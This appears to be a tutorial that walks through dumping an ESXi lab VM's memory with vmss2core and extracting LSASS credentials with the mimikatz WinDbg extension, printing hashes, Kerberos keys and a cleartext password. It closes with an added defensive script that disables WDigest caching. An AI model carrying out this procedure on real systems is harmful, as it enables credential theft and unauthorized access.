[VM]Get Password from Virtual Machine Memory
Env.
Virtual Machine
Target VM : win7x86 ( Build 7600) Based on ESXi 5.0
Process VM : Windows 7 SP1 x86 Build 7601
Tools
Step
Get dmp file
- Pause the running target VM.
- Copy vmss2core-Linux64 to ESXi (/vmfs/volumes/…/win7x86/) with WinSCP.
- Use vmss2core to convert win7x86-xxx.vmss into a dmp file (memory.dmp).
- Copy memory.dmp to the Process VM (c:/vmss/) with WinSCP.
/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"
vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2779be8
Win32: MmPfnDatabase=0x827b9700
Win32: PsLoadedModuleList=0x82799810
Win32: PsActiveProcessHead=0x82791e98
Win32: KiBugcheckData=0x827b1a00
Win32: KernBase=0x82651000
Win32: NtBuildLab=0x826a1068
CoreDumpScanWin32: MinorVersion set to 7600
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
...
... 1010 MBs written.
... 1020 MBs written.
Finished writing core.
Locate lsass process
- Load the dump file into WinDbg (File -> Open Crash Dump).
- Load symbols with the following commands.
- Locate the lsass process and switch to its context with the following commands.
kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
kd> .reload
Loading Kernel Symbols
...................................................
Loading User Symbols
...................................................
Loading unloaded module list
......
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll -

kd> !process 0 0 lsass.exe
PROCESS 85d37a68  SessionId: 0  Cid: 0204    Peb: 7ffd8000  ParentCid: 0194
    DirBase: 3eab20e0  ObjectTable: 96371e60  HandleCount: 564.
    Image: lsass.exe

kd> .process /r /p 85d37a68
Implicit process is now 85d37a68
Loading User Symbols
..............................................................
Get password
- Load the mimilib.dll file.
- Run mimikatz.
kd> .load C:\vmss\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    WinDBG extension ! * * */

===================================
#   * Kernel mode *   #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz

===================================
#   * User mode *   #
===================================
0:000> !mimikatz
===================================

kd> !mimikatz

DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:

SekurLSA
========
Authentication Id : 0 ; 618511 (00000000:0009700f)
Session           : Interactive from 1
User Name         : WIN7X86EN
Domain            : WIN7X86EN-PC
Logon Server      : WIN7X86EN-PC
Logon Time        : 2/24/2017 1:19:20 AM
SID               : S-1-5-21-2794451615-1102251730-2481481344-1000
        msv :
         [00000003] Primary
         * Username : WIN7X86EN
         * Domain   : WIN7X86EN-PC
         * LM       : 16a5d217f7c9c7befdcfc2afb2d1be34
         * NTLM     : a91a49a72e7cf292cdad1bffdead9fd3
         * SHA1     : e4496b25c5afb22a92d28dadecb7d5873e920b6e
        tspkg :
         * Username : WIN7X86EN
         * Domain   : WIN7X86EN-PC
         * Password : mypassword
        wdigest :
         * Username : WIN7X86EN
         * Domain   : WIN7X86EN-PC
         * Password : mypassword
        kerberos :
         * Username : WIN7X86EN
         * Domain   : WIN7X86EN-PC
         * Password : mypassword
         * Key List
           aes256_hmac       <no size, buffer is incorrect>
           aes128_hmac       <no size, buffer is incorrect>
           rc4_hmac_nt       a91a49a72e7cf292cdad1bffdead9fd3
           rc4_hmac_old      a91a49a72e7cf292cdad1bffdead9fd3
           rc4_md4           a91a49a72e7cf292cdad1bffdead9fd3
           rc4_hmac_nt_exp   a91a49a72e7cf292cdad1bffdead9fd3
           rc4_hmac_old_exp  a91a49a72e7cf292cdad1bffdead9fd3
        ssp :
        masterkey :
        credman :
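The tspkg and wdigest sections above hold the logon password in cleartext because Windows 7 caches reversible credentials in LSASS by default, so a suspended VM's memory file is as sensitive as the credentials themselves. As an added example that is not part of the original post, this PowerShell script audits that behaviour on the guest and, with -Remediate, turns the caching off through the UseLogonCredential setting; it assumes a Windows 7 / 2008 R2 guest with KB2871997 installed (the update that makes the setting effective on those versions) and an elevated prompt.

```powershell
# Added example (not from the original post): audit or remediate WDigest
# cleartext credential caching, which is what lets the tspkg/wdigest
# entries of the dump above contain "Password : mypassword".
# Assumes Windows 7 / 2008 R2 with KB2871997, run from an elevated prompt.
param(
    [switch]$Remediate   # without this switch the script only reports
)

$Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$Name = 'UseLogonCredential'

# KB2871997 introduced UseLogonCredential on Windows 7 / 2008 R2; without
# it the registry value is ignored and cleartext stays in LSASS regardless.
$hotfix = Get-HotFix -Id 'KB2871997' -ErrorAction SilentlyContinue
if (-not $hotfix) {
    Write-Warning 'KB2871997 not installed: UseLogonCredential will have no effect.'
}

$current = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
if ($null -eq $current) {
    # On Windows 7 / 2008 R2 an absent value means the default: cache cleartext.
    Write-Output "$Name is not set (default on this OS: cleartext cached in LSASS)"
} elseif ($current -eq 0) {
    Write-Output "$Name = 0 (cleartext caching disabled)"
} else {
    Write-Output "$Name = $current (cleartext caching ENABLED)"
}

if ($Remediate -and $current -ne 0) {
    New-ItemProperty -Path $Key -Name $Name -PropertyType DWord -Value 0 -Force | Out-Null
    # Credentials already held by LSASS remain until those sessions end;
    # the change protects logons that happen after the next reboot.
    Write-Output "$Name set to 0; reboot to flush credentials cached for current sessions."
}
```

Run it without parameters on a fleet to find guests still caching cleartext; note that the msv NTLM hash and the kerberos keys shown in the dump remain in LSASS even after this change, so the memory file still needs the same access controls as a credential store.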
Refer
Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2